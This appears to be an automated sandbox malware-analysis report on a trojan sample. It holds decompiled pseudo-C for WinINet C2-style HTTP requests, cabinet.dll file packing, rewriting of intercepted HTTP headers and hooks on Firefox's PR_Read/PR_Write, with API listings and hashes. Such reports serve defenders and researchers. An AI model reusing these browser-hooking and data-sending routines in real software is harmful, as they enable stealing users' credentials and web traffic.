            0x00000000
            0x00000000
            0x00000000
            0x0040b83b
            0x0040b833
            0x0040b82b
            0x0040b7fe
            0x0040b7fe
            0x0040b800
            0x0040b802
            0x0040b808
            0x0040b808
            0x0040b80c
            0x00000000
            0x0040b80e
            0x0040b80e
            0x0040b812
            0x0040b83d
            0x0040b83f
            0x0040b863
            0x0040b867
            0x0040b871
            0x0040b879
            0x0040b881
            0x0040b887
            0x0040b889
            0x0040b88b
            0x0040b88f
            0x0040b894
            0x0040b896
            0x0040b898
            0x0040b89d
            0x0040b8c3
            0x0040b8ce
            0x0040b8d7
            0x0040b8d9
            0x0040b8e5
            0x0040b8e6
            0x0040b8ed
            0x0040b8fe
            0x0040b89f
            0x0040b89f
            0x0040b8a4
            0x0040b8ac
            0x0040b8ad
            0x0040b8b2
            0x0040b8b7
            0x0040b8ba
            0x0040b8bf
            0x0040b8c1
            0x00000000
            0x00000000
            0x0040b8c1
            0x0040b8a4
            0x0040b89d
            0x0040b896
            0x0040b906
            0x0040b90b
            0x0040b90d
            0x00000000
            0x00000000
            0x00000000
            0x0040b812
            0x0040b804
            0x0040b804
            0x0040b806
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0040b806
            0x0040b802
            0x0040b7fc
            0x0040b7f3
            0x0040b7ea
            0x0040b912
            0x00000000
            0x0040b912
            0x0040b6da
            0x0040b6dc
            0x0040b6e6
            0x0040b6f7
            0x00000000
            0x0040b6fd
            0x0040b6fd
            0x0040b700
            0x0040b702
            0x0040b707
            0x00000000
            0x0040b70d
            0x0040b70d
            0x0040b70d
            0x0040b713
            0x00000000
            0x00000000
            0x0040b71d
            0x00000000
            0x0040b723
            0x0040b723
            0x0040b726
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0040b726
            0x00000000
            0x0040b71d
            0x0040b72a
            0x00000000
            0x0040b738
            0x0040b743
            0x0040b747
            0x00000000
            0x0040b74d
            0x0040b752
            0x0040b757
            0x0040b765
            0x0040b769
            0x0040b781
            0x0040b781
            0x0040b784
            0x0040b789
            0x0040b79c
            0x0040b7a1
            0x0040b78b
            0x0040b78f
            0x0040b794
            0x0040b794
            0x0040b7a7
            0x0040b76b
            0x0040b773
            0x0040b777
            0x00000000
            0x0040b779
            0x0040b77a
            0x0040b77a
            0x0040b777
            0x0040b7a9
            0x0040b7ad
            0x0040b7b2
            0x0040b7b8
            0x0040b7b8
            0x0040b747
            0x0040b72a
            0x0040b707
            0x00000000
            0x00000000
            0x00000000
            0x0040b6e6
            0x0040b6d4
            0x0040b91b
            0x0040b921

            APIs
            • EnterCriticalSection.KERNEL32(0041AA1C,0000FDE9,?), ref: 0040B757
            • LeaveCriticalSection.KERNEL32(0041AA1C,?,000000FF), ref: 0040B7B2
            • EnterCriticalSection.KERNEL32(0041AA1C), ref: 0040B7CD
            • getpeername.WS2_32 ref: 0040B881
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalSection$Enter$Leavegetpeername
            • String ID: FMAV$LASV$PISQ$PIST$S\AV$TQPG$U[EP$d$e
            • API String ID: 1099368488-1876342263
            • Opcode ID: 03cf219e80323a5e29ab8fa68eeac4349245ddf795d9476fef257a3b88686f62
            • Instruction ID: 1a5596c8ea5751bace2b092f6d630db204c77c5fc4164940623e21ba233326d1
            • Opcode Fuzzy Hash: 03cf219e80323a5e29ab8fa68eeac4349245ddf795d9476fef257a3b88686f62
            • Instruction Fuzzy Hash: 645133729043419ADB31AA64C8847AB7B95DF81704F04893BEA94B73E1C33CCD8597DE
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004077CB Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 184networkCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 100%
            			E004077CB(intOrPtr* _a4) {
				char _v532;
				void* _v536;
				short _v540;
				char* _v552;
				void* _v568;
				char _v570;
				char _v572;
				char _v576;
				char* _v580;
				void* _v592;
				char _v596;
				char _v600;
				void* _v620;
				void* _v624;
				void* _v628;
				char* _v632;
				long _v648;
				void _v652;
				intOrPtr _v656;
				char _v668;
				intOrPtr _v672;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void* _t56;
				intOrPtr _t58;
				void* _t63;
				void* _t67;
				signed int _t69;
				void* _t95;
				void* _t100;
				char* _t102;
				intOrPtr* _t110;
				void* _t114;
				intOrPtr* _t115;
				signed int _t121;
				void* _t123;

				_t123 = (_t121 & 0xfffffff8) - 0x224;
				_t110 = _a4;
				if(E00414FF4( &_v532,  *((intOrPtr*)(_t110 + 4))) == 0) {
					L26:
					return 0;
				}
				_t53 = InternetOpenA( *0x41a508, 0, 0, 0, 0);
				_v536 = _t53;
				if(_t53 == 0) {
					L25:
					E00410418(_v552);
					E00410418(_v552);
					goto L26;
				}
				_t56 = InternetConnectA(_t53, _v552, _v540, 0, 0, 3, 0, 0);
				_v592 = _t56;
				if(_t56 == 0) {
					L24:
					InternetCloseHandle(_v568);
					goto L25;
				}
				_t58 =  *_t110;
				_t102 = "POST";
				if( *((char*)(_t58 + 0x14)) != 1) {
					_t102 = "GET";
				}
				_t100 = HttpOpenRequestA(_v592, _t102, _v580, "HTTP/1.1",  *(_t58 + 4), 0, (0 | _v570 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
				_v620 = _t100;
				if(_t100 == 0) {
					L23:
					InternetCloseHandle(_v624);
					goto L24;
				} else {
					E00403E7C(_t102,  &_v576);
					_t63 = 0xb;
					E0040F333(_t63,  &_v600);
					_t66 =  *_a4;
					if( *((intOrPtr*)( *_a4 + 0x1c)) > 0) {
						_t95 = E00411233( &_v632,  &_v600,  *((intOrPtr*)(_t66 + 0x18)));
						_t123 = _t123 + 0xc;
						if(_t95 > 0) {
							HttpAddRequestHeadersA(_t100, _v632, 0xffffffff, 0xa0000000);
							E00410418(_v648);
						}
					}
					_t67 = 0xc;
					E0040F333(_t67,  &_v596);
					_t69 = E00411098( &_v572);
					_v628 = _t69;
					_t72 = 2 + _t69 * 6;
					if(2 + _t69 * 6 == 0) {
						L12:
						_t114 = 0;
						goto L13;
					} else {
						_t114 = E004103ED(_t72);
						if(_t114 == 0) {
							goto L12;
						}
						E00415327(_t114,  &_v572, _v628);
						_t100 = _v628;
						L13:
						if(_t114 != 0 && E00411233( &_v632,  &_v596, _t114) > 0) {
							HttpAddRequestHeadersA(_t100, _v632, 0xffffffff, 0xa0000000);
							E00410418(_v648);
						}
						E00410418(_t114);
						_t115 = _a4;
						if(HttpSendRequestA(_t100, 0, 0,  *( *_t115 + 0x20),  *( *_t115 + 0x24)) != 1) {
							L22:
							InternetCloseHandle(_t100);
							goto L23;
						} else {
							_v648 = 4;
							_v652 = 0;
							if(HttpQueryInfoA(_t100, 0x20000013,  &_v652,  &_v648, 0) != 1 || _v672 != 0xc8) {
								goto L22;
							} else {
								if(E004123BD( &_v668, _t100) != 0) {
									E00410418(_t80);
								}
								E00410418(_v656);
								E00410418(_v656);
								 *((intOrPtr*)(_t115 + 8)) = _v668;
								goto L26;
							}
						}
					}
				}
			}









































            0x004077d1
            0x004077da
            0x004077eb
            0x004079f9
            0x00407a01
            0x00407a01
            0x004077fd
            0x00407803
            0x00407809
            0x004079e7
            0x004079eb
            0x004079f4
            0x00000000
            0x004079f4
            0x0040781e
            0x00407824
            0x0040782a
            0x004079dd
            0x004079e1
            0x00000000
            0x004079e1
            0x00407830
            0x00407836
            0x0040783b
            0x0040783d
            0x0040783d
            0x00407873
            0x00407875
            0x0040787b
            0x004079d3
            0x004079d7
            0x00000000
            0x00407881
            0x00407886
            0x00407891
            0x00407892
            0x0040789a
            0x0040789f
            0x004078ac
            0x004078b1
            0x004078b6
            0x004078c4
            0x004078ce
            0x004078ce
            0x004078b6
            0x004078d9
            0x004078da
            0x004078e3
            0x004078e8
            0x004078f0
            0x004078f1
            0x00407914
            0x00407914
            0x00000000
            0x004078f3
            0x004078f8
            0x004078fc
            0x00000000
            0x00000000
            0x00407909
            0x0040790e
            0x00407916
            0x00407918
            0x0040793d
            0x00407947
            0x00407947
            0x0040794d
            0x00407952
            0x00407969
            0x004079cc
            0x004079cd
            0x00000000
            0x0040796b
            0x0040797c
            0x00407984
            0x00407991
            0x00000000
            0x0040799d
            0x004079a9
            0x004079ac
            0x004079ac
            0x004079b5
            0x004079be
            0x004079c7
            0x00000000
            0x004079c7
            0x00407991
            0x00407969
            0x004078f1

            APIs
              • Part of subcall function 00414FF4: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00415023
            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 004077FD
            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040781E
            • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 0040786D
            • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 004078C4
            • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040793D
            • HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00407960
            • HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00407988
            • InternetCloseHandle.WININET(00000000), ref: 004079CD
            • InternetCloseHandle.WININET(?), ref: 004079D7
              • Part of subcall function 004123BD: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 004123D1
              • Part of subcall function 004123BD: GetLastError.KERNEL32 ref: 004123D7
              • Part of subcall function 004123BD: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 004123FB
              • Part of subcall function 00410418: HeapFree.KERNEL32(00000000,00000000,00411C0D,00000000,?,?,?,?,0040373A,00000000,00403AF4), ref: 0041042B
            • InternetCloseHandle.WININET(?), ref: 004079E1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
            • String ID: GET$HTTP/1.1$POST
            • API String ID: 1023423486-2753618334
            • Opcode ID: 60ba26d390a717092d07e8262c15f17f9c64d6e31d6432aa1e6b16e4d8528128
            • Instruction ID: 204df5710b16d53696dce1ca62a07a06300b5f45112f2ec471d17f75ee7b4a69
            • Opcode Fuzzy Hash: 60ba26d390a717092d07e8262c15f17f9c64d6e31d6432aa1e6b16e4d8528128
            • Instruction Fuzzy Hash: E151D572408211ABD710AF61CD48D9F7FA9FF88354F00493EF545A21B2C738E985CBAA
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00413F54 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52libraryloadermemoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 699 413f54-413f5d 700 413f63-413f75 LoadLibraryA 699->700 701 414008-414011 699->701 702 414004-414007 700->702 703 413f7b-413fcc GetProcAddress * 4 700->703 704 413ff8-413ffe FreeLibrary 703->704 705 413fce-413fd4 703->705 704->702 705->704 706 413fd6-413fdc 705->706 706->704 707 413fde-413fe0 706->707 707->704 708 413fe2-413ff6 HeapCreate 707->708 708->701 708->704
            C-Code - Quality: 100%
            			E00413F54() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t7;
				void* _t9;
				intOrPtr _t18;

				if( *0x41bc78 != 0) {
					L9:
					 *0x41bc78 =  *0x41bc78 + 1;
					return 1;
				} else {
					_t2 = LoadLibraryA("cabinet.dll");
					 *0x41bc74 = _t2;
					if(_t2 == 0) {
						L8:
						return 0;
					} else {
						 *0x41bc60 = GetProcAddress(_t2, "FCICreate");
						 *0x41bc64 = GetProcAddress( *0x41bc74, "FCIAddFile");
						 *0x41ae98 = GetProcAddress( *0x41bc74, "FCIFlushCabinet");
						_t7 = GetProcAddress( *0x41bc74, "FCIDestroy");
						 *0x41bc6c = _t7;
						if( *0x41bc60 == 0 ||  *0x41bc64 == 0) {
							L7:
							FreeLibrary( *0x41bc74);
							goto L8;
						} else {
							_t18 =  *0x41ae98; // 0x0
							if(_t18 == 0 || _t7 == 0) {
								goto L7;
							} else {
								_t9 = HeapCreate(0, 0x80000, 0);
								 *0x41ae94 = _t9;
								if(_t9 != 0) {
									goto L9;
								} else {
									goto L7;
								}
							}
						}
					}
				}
			}







            0x00413f5d
            0x00414008
            0x00414008
            0x00414011
            0x00413f63
            0x00413f68
            0x00413f6e
            0x00413f75
            0x00414004
            0x00414007
            0x00413f7b
            0x00413f95
            0x00413fa7
            0x00413fb9
            0x00413fbe
            0x00413fc0
            0x00413fcc
            0x00413ff8
            0x00413ffe
            0x00000000
            0x00413fd6
            0x00413fd6
            0x00413fdc
            0x00000000
            0x00413fe2
            0x00413fe9
            0x00413fef
            0x00413ff6
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00413ff6
            0x00413fdc
            0x00413fcc
            0x00413f75

            APIs
            • LoadLibraryA.KERNEL32(cabinet.dll,00000000,0041403B,?,0041425F,?,?,00000000,?,?,?), ref: 00413F68
            • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00413F88
            • GetProcAddress.KERNEL32(FCIAddFile), ref: 00413F9A
            • GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 00413FAC
            • GetProcAddress.KERNEL32(FCIDestroy), ref: 00413FBE
            • HeapCreate.KERNEL32(00000000,00080000,00000000,0041425F,?,?,00000000,?,?,?), ref: 00413FE9
            • FreeLibrary.KERNEL32(0041425F,?,?,00000000,?,?,?), ref: 00413FFE
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressProc$Library$CreateFreeHeapLoad
            • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
            • API String ID: 2040708800-1163896595
            • Opcode ID: 72320dcc5b6802833f6dd50d8916b7a722dfd240361883db9908659d8a9a510b
            • Instruction ID: 6ffc112349c9a2d3b368f84fe05adf98fca7b5e0abe816f96f08ca929a7c7f14
            • Opcode Fuzzy Hash: 72320dcc5b6802833f6dd50d8916b7a722dfd240361883db9908659d8a9a510b
            • Instruction Fuzzy Hash: 71115E31950710EACB225F35BD499D67EB5F389B52324823FE900A2270EF790581CBCC
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040B240 Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 255COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 764 40b240-40b258 call 403e2a call 403e39 769 40b2d0-40b2df 764->769 770 40b25a-40b25e 764->770 774 40b2e2-40b2e8 769->774 770->769 771 40b260-40b264 770->771 771->769 773 40b266-40b283 EnterCriticalSection call 40a2fb 771->773 777 40b285-40b292 773->777 778 40b2c9-40b2ca LeaveCriticalSection 773->778 779 40b298-40b29c 777->779 780 40b46e-40b498 LeaveCriticalSection 777->780 778->769 781 40b2a2-40b2b9 call 40a7d5 779->781 782 40b51f-40b542 LeaveCriticalSection 779->782 785 40b501-40b505 780->785 786 40b49a-40b4a9 EnterCriticalSection call 40a2fb 780->786 790 40b2e9-40b2ef 781->790 791 40b2bb-40b2c4 call 40a3b7 call 407754 781->791 782->785 792 40b544-40b553 EnterCriticalSection call 40a2fb 782->792 785->774 800 40b4c0-40b4cf 786->800 801 40b4ab-40b4be 786->801 793 40b2f5-40b305 call 406eca 790->793 794 40b50a-40b51c call 407754 790->794 791->778 804 40b555-40b568 792->804 805 40b56a-40b57c 792->805 815 40b307-40b329 call 407754 LeaveCriticalSection 793->815 816 40b32b-40b335 793->816 794->782 809 40b4d1-40b4ea call 410418 call 4104b9 800->809 810 40b4ec-40b4f2 800->810 814 40b4fa-40b4fb LeaveCriticalSection 801->814 820 40b58c-40b58f LeaveCriticalSection 804->820 812 40b587 call 40a3b7 805->812 813 40b57e-40b585 805->813 809->814 810->814 812->820 813->820 814->785 815->774 823 40b33b-40b34e call 41046b 816->823 824 40b3cf-40b3d4 816->824 820->785 835 40b350-40b35d call 4077a6 823->835 836 40b35f-40b3cb call 4077a6 call 410418 * 2 call 410882 call 415540 call 4154c4 * 2 823->836 826 40b3d6-40b3dc 824->826 827 40b43b-40b440 824->827 833 40b3e6 826->833 834 40b3de-40b3e4 826->834 827->794 831 40b446-40b46b call 407754 827->831 831->780 838 40b3ea-40b417 call 40aa77 call 410418 833->838 834->838 835->824 836->824 852 40b430-40b433 838->852 853 40b419-40b41c 838->853 852->827 856 40b435-40b436 call 410418 852->856 853->794 855 40b422-40b42e 853->855 855->827 856->827
            C-Code - Quality: 82%
            			E0040B240(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed char _v72;
				signed int _v76;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v112;
				void* __esi;
				signed int _t112;
				signed int _t114;
				signed char _t115;
				signed int _t116;
				void* _t118;
				signed char _t122;
				signed int _t123;
				signed char _t127;
				signed int _t130;
				signed char _t132;
				signed char _t138;
				intOrPtr _t151;
				signed char _t167;
				void* _t173;
				void* _t180;
				intOrPtr _t181;
				signed int _t187;
				void* _t189;
				void* _t191;
				signed int _t205;
				signed int _t206;

				_t180 = __edx;
				E00403E2A();
				if(E00403E39() == 0 || _a8 == 0 || _a12 <= 0) {
					L9:
					_t112 =  *0x41a9e0(_a4, _a8, _a12);
					goto L10;
				} else {
					EnterCriticalSection(0x41a9f0);
					_t195 = _a4;
					_t187 = E0040A2FB(_a4);
					_v68 = _t187;
					if(_t187 == 0xffffffff) {
						L8:
						LeaveCriticalSection(0x41a9f0);
						goto L9;
					}
					_t189 = _t187 * 0x38 +  *0x41aa0c;
					if( *(_t189 + 0x20) > 0) {
						L29:
						_t114 =  *(_t189 + 0x24);
						_t191 =  *(_t189 + 0x20) - _t114;
						LeaveCriticalSection(0x41a9f0);
						_t198 = _a4;
						_t115 =  *0x41a9e0(_a4,  *((intOrPtr*)(_t189 + 0x1c)) + _t114, _t191);
						_v72 = _t115;
						__eflags = _t115 - 0xffffffff;
						if(_t115 != 0xffffffff) {
							EnterCriticalSection(0x41a9f0);
							_t116 = E0040A2FB(_t198);
							__eflags = _t116 - 0xffffffff;
							if(_t116 != 0xffffffff) {
								_t167 = _v72;
								_t118 = _t116 * 0x38 +  *0x41aa0c;
								__eflags = _t167 - _t191;
								if(_t167 != _t191) {
									 *((intOrPtr*)(_t118 + 0x24)) =  *((intOrPtr*)(_t118 + 0x24)) + _t167;
									_t92 = _t118 + 0x28;
									 *_t92 =  *(_t118 + 0x28) - 1;
									__eflags =  *_t92;
									_v72 = 1;
								} else {
									_t88 = _t118 + 0x1c; // -4303344
									_v72 =  *(_t118 + 0x28);
									E00410418( *_t88);
									E004104B9(_t88, 0x10);
								}
							} else {
								_v72 = _v72 | _t116;
								 *0x41a9ec(0xffffe890, 8);
							}
							LeaveCriticalSection(0x41a9f0);
						}
						L36:
						_t112 = _v72;
						L10:
						return _t112;
					}
					if( *(_t189 + 8) > 0) {
						L38:
						LeaveCriticalSection(0x41a9f0);
						_t200 = _a4;
						_t122 =  *0x41a9e0(_a4, _a8, _a12);
						_v72 = _t122;
						__eflags = _t122 - 0xffffffff;
						if(_t122 != 0xffffffff) {
							EnterCriticalSection(0x41a9f0);
							_t123 = E0040A2FB(_t200);
							__eflags = _t123 - 0xffffffff;
							if(_t123 != 0xffffffff) {
								_t173 = _t123 * 0x38 +  *0x41aa0c;
								_t181 =  *((intOrPtr*)(_t173 + 8));
								__eflags = _v72 - _t181;
								if(_v72 > _t181) {
									E0040A3B7(_t123);
								} else {
									 *((intOrPtr*)(_t173 + 8)) = _t181 - _v72;
								}
							} else {
								_v72 = _v72 | _t123;
								 *0x41a9ec(0xffffe890, 8);
							}
							LeaveCriticalSection(0x41a9f0);
						}
						goto L36;
					}
					_t176 = _a8;
					_t127 = E0040A7D5(_a12, _a8,  &_v60, _t195);
					_v68 = _t127;
					if(_t127 != 0xffffffff) {
						__eflags = _v60;
						if(_v60 == 0) {
							L37:
							E00407754( &_v60);
							_t130 = _v64 + _a12;
							__eflags = _t130;
							 *(_t189 + 8) = _t130;
							goto L38;
						}
						_t132 = E00406ECA(_t180,  &_v60);
						_v72 = _t132;
						__eflags = _t132 & 0x00000001;
						if((_t132 & 0x00000001) == 0) {
							_v76 = 0;
							_v72 = 0;
							__eflags = _t132 & 0x00000002;
							if(__eflags != 0) {
								_t206 = E0041046B(__eflags, _a8, _a12);
								_v84 = _t206;
								__eflags = _t206;
								if(_t206 != 0) {
									E004077A6( *((intOrPtr*)(_t189 + 0x10)),  *((intOrPtr*)(_t189 + 0xc)));
									E00410418( *(_t189 + 0x14));
									E00410418( *((intOrPtr*)(_t189 + 4)));
									_t151 = E00410882(_v64, _v68);
									 *(_t189 + 0x14) =  *(_t189 + 0x14) & 0x00000000;
									_t38 = _t189 + 0x18;
									 *_t38 =  *(_t189 + 0x18) & 0x00000000;
									__eflags =  *_t38;
									 *((intOrPtr*)(_t189 + 4)) = _t151;
									 *((intOrPtr*)(_t189 + 0xc)) = _v36;
									 *((intOrPtr*)(_t189 + 0x10)) = _v32;
									_v112 = E004154C4(E004154C4(E00415540(_t206, _a12, "Accept-Encoding", "identity"), _t176, _t206, "TE"), _t176, _t206, "If-Modified-Since");
								} else {
									E004077A6(_v16, _v20);
								}
							}
							__eflags = _v68 & 0x00000004;
							if((_v68 & 0x00000004) == 0) {
								L27:
								__eflags = _v76;
								if(_v76 == 0) {
									goto L37;
								}
								E00407754( &_v60);
								_t70 = _t189 + 0x24;
								 *_t70 =  *(_t189 + 0x24) & 0x00000000;
								__eflags =  *_t70;
								 *(_t189 + 8) = _v64;
								 *((intOrPtr*)(_t189 + 0x1c)) = _v76;
								 *(_t189 + 0x20) = _v72;
								 *(_t189 + 0x28) = _a12;
								goto L29;
							}
							_t205 = _v76;
							__eflags = _t205;
							if(_t205 != 0) {
								_t138 = _v72;
							} else {
								_t205 = _a8;
								_t138 = _a12;
							}
							_v68 = _t138;
							_v88 = E0040AA77(_v68, _t205, _v28, _v24,  &_v76);
							E00410418(_v44);
							__eflags = _v92;
							if(_v92 != 0) {
								__eflags = _t205 - _a8;
								if(_t205 != _a8) {
									E00410418(_t205);
								}
							} else {
								__eflags = _t205 - _a8;
								if(_t205 == _a8) {
									goto L37;
								}
								_v76 = _t205;
								_v72 = _v68;
							}
							goto L27;
						} else {
							E00407754( &_v60);
							LeaveCriticalSection(0x41a9f0);
							_t112 =  *0x41a9ec(0xffffe8a3, 0) | 0xffffffff;
							goto L10;
						}
					} else {
						E0040A3B7(_v68);
						E00407754( &_v60);
						goto L8;
					}
				}
			}









































            0x0040b240
            0x0040b24c
            0x0040b258
            0x0040b2d0
            0x0040b2d9
            0x00000000
            0x0040b266
            0x0040b26c
            0x0040b272
            0x0040b27a
            0x0040b27c
            0x0040b283
            0x0040b2c9
            0x0040b2ca
            0x00000000
            0x0040b2ca
            0x0040b288
            0x0040b292
            0x0040b46e
            0x0040b46e
            0x0040b47a
            0x0040b47c
            0x0040b484
            0x0040b488
            0x0040b491
            0x0040b495
            0x0040b498
            0x0040b49b
            0x0040b4a1
            0x0040b4a6
            0x0040b4a9
            0x0040b4c0
            0x0040b4c7
            0x0040b4cd
            0x0040b4cf
            0x0040b4ec
            0x0040b4ef
            0x0040b4ef
            0x0040b4ef
            0x0040b4f2
            0x0040b4d1
            0x0040b4d4
            0x0040b4d9
            0x0040b4dd
            0x0040b4e5
            0x0040b4e5
            0x0040b4ab
            0x0040b4ab
            0x0040b4b6
            0x0040b4bd
            0x0040b4fb
            0x0040b4fb
            0x0040b501
            0x0040b501
            0x0040b2e2
            0x0040b2e8
            0x0040b2e8
            0x0040b29c
            0x0040b51f
            0x0040b526
            0x0040b52b
            0x0040b532
            0x0040b53b
            0x0040b53f
            0x0040b542
            0x0040b545
            0x0040b54b
            0x0040b550
            0x0040b553
            0x0040b56f
            0x0040b575
            0x0040b578
            0x0040b57c
            0x0040b587
            0x0040b57e
            0x0040b582
            0x0040b582
            0x0040b555
            0x0040b555
            0x0040b560
            0x0040b567
            0x0040b58d
            0x0040b58d
            0x00000000
            0x0040b542
            0x0040b2a5
            0x0040b2ad
            0x0040b2b2
            0x0040b2b9
            0x0040b2eb
            0x0040b2ef
            0x0040b50a
            0x0040b50e
            0x0040b51a
            0x0040b51a
            0x0040b51c
            0x00000000
            0x0040b51c
            0x0040b2fa
            0x0040b2ff
            0x0040b303
            0x0040b305
            0x0040b32b
            0x0040b32f
            0x0040b333
            0x0040b335
            0x0040b346
            0x0040b348
            0x0040b34c
            0x0040b34e
            0x0040b365
            0x0040b36d
            0x0040b375
            0x0040b382
            0x0040b387
            0x0040b38b
            0x0040b38b
            0x0040b38b
            0x0040b394
            0x0040b3a3
            0x0040b3ab
            0x0040b3cb
            0x0040b350
            0x0040b358
            0x0040b358
            0x0040b34e
            0x0040b3cf
            0x0040b3d4
            0x0040b43b
            0x0040b43b
            0x0040b440
            0x00000000
            0x00000000
            0x0040b44a
            0x0040b453
            0x0040b453
            0x0040b453
            0x0040b457
            0x0040b45e
            0x0040b465
            0x0040b46b
            0x00000000
            0x0040b46b
            0x0040b3d6
            0x0040b3da
            0x0040b3dc
            0x0040b3e6
            0x0040b3de
            0x0040b3de
            0x0040b3e1
            0x0040b3e1
            0x0040b3ea
            0x0040b409
            0x0040b40d
            0x0040b412
            0x0040b417
            0x0040b430
            0x0040b433
            0x0040b436
            0x0040b436
            0x0040b419
            0x0040b419
            0x0040b41c
            0x00000000
            0x00000000
            0x0040b426
            0x0040b42a
            0x0040b42a
            0x00000000
            0x0040b307
            0x0040b30b
            0x0040b311
            0x0040b326
            0x00000000
            0x0040b326
            0x0040b2bb
            0x0040b2bf
            0x0040b2c4
            0x00000000
            0x0040b2c4
            0x0040b2b9

            APIs
              • Part of subcall function 00403E2A: WaitForSingleObject.KERNEL32(000000FF,00404A1C), ref: 00403E32
              • Part of subcall function 00403E39: WaitForSingleObject.KERNEL32(00000000,00405F1B,00000310,00000000,00000310,909011A2,00000002), ref: 00403E41
            • EnterCriticalSection.KERNEL32(0041A9F0), ref: 0040B26C
            • LeaveCriticalSection.KERNEL32(0041A9F0), ref: 0040B2CA
            • LeaveCriticalSection.KERNEL32(0041A9F0), ref: 0040B311
            • LeaveCriticalSection.KERNEL32(0041A9F0), ref: 0040B47C
            • EnterCriticalSection.KERNEL32(0041A9F0), ref: 0040B49B
            • LeaveCriticalSection.KERNEL32(0041A9F0), ref: 0040B4FB
            • LeaveCriticalSection.KERNEL32(0041A9F0), ref: 0040B526
            • EnterCriticalSection.KERNEL32(0041A9F0), ref: 0040B545
            • LeaveCriticalSection.KERNEL32(0041A9F0), ref: 0040B58D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalSection$Leave$Enter$ObjectSingleWait
            • String ID: Accept-Encoding$If-Modified-Since$identity
            • API String ID: 3286975823-3034467039
            • Opcode ID: 205d78ab8d769130560eb1e77c96101c48fc9d797f1f205b47c3e261e9c3fe52
            • Instruction ID: 469a88ef300fe4c6656e49afb92f3cee3de25d7ea1839db42cc55efcad75fa96
            • Opcode Fuzzy Hash: 205d78ab8d769130560eb1e77c96101c48fc9d797f1f205b47c3e261e9c3fe52
            • Instruction Fuzzy Hash: 3CA16A71504701ABCB00EF24DD45A5ABBA4FF88314F104A2EF855B72A2D738E995CBDA
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004064DA Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 41libraryloaderCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 882 4064da-406535 GetProcAddress * 4 ResetEvent call 406290 885 406556-406566 SetEvent 882->885 886 406537-406551 call 40a754 882->886 886->885
            C-Code - Quality: 70%
            			E004064DA(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
				void* _t6;
				void* _t12;
				void* _t13;
				void* _t14;

				_t14 = __edx;
				_t13 = __ecx;
				 *0x41a140 = GetProcAddress(__edi, "PR_OpenTCPSocket");
				 *0x41a150 = GetProcAddress(__edi, "PR_Close");
				 *0x41a160 = GetProcAddress(__edi, "PR_Read");
				 *0x41a170 = GetProcAddress(__edi, "PR_Write");
				ResetEvent( *0x41a500);
				_push(0);
				_push(0x41a140);
				_t6 = 4;
				_t12 = E00406290(_t6, _t13, _t14);
